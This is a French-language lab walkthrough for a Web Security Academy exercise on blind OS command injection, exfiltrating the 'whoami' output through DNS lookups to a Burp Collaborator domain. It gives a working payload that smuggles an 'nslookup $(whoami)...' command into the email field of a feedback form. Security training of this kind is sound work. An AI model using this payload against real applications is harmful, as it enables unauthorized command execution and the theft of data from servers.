Injection de commandes aveugle avec exfiltration OOB

Dans cette leçon, on exploite une injection de commandes aveugle en utilisant une technique d’exfiltration avancée basée sur des requêtes DNS dirigées vers un domaine contrôlé. L’idée est d’exécuter le whoami via la vulnérabilité, puis de faire fuiter son résultat dans un sous-domaine généré par Burp Collaborator, ce qui permet de récupérer des données sensibles même lorsque l’application ne renvoie aucune sortie de commande. Cette approche est particulièrement utile dans des contextes où la visibilité est limitée mais où l’on peut encore provoquer des interactions out-of-band.

Lab: Blind OS command injection with out-of-band data exfiltration | Web Security AcademyWebSecAcademy

Description du laboratoire

L’application vulnérable contient une injection de commandes aveugle dans la fonctionnalité de feedback.

La commande système construite avec les données utilisateur est exécutée de manière asynchrone, sans impacter la réponse HTTP.
Il est impossible de rediriger la sortie vers un emplacement accessible.
En revanche, il est possible de déclencher des interactions OOB, notamment des requêtes DNS envoyées vers Burp Collaborator.

L’objectif du lab est d'exécuter whoami et d’exfiltrer le résultat via une requête DNS, puis de fournir le nom de l’utilisateur obtenu pour valider l’exercice.

Payload utilisé

Nous envoyons un payload dans le champ vulnérable (par exemple l’email) afin de provoquer une résolution DNS contenant la sortie de whoami :

[email protected];nslookup $(whoami).77dhdw7gjigwd7whdwdwdigurjidwd7wwdw7d.oaatify.com

La requête DNS reçue sur le sous-domaine généré par Collaborator contiendra alors la valeur retournée par whoami, ce qui permet d’extraire l’information malgré l’absence de sortie directe dans l’application.

Mis à jour il y a 2 jours

Ce contenu vous a-t-il été utile ?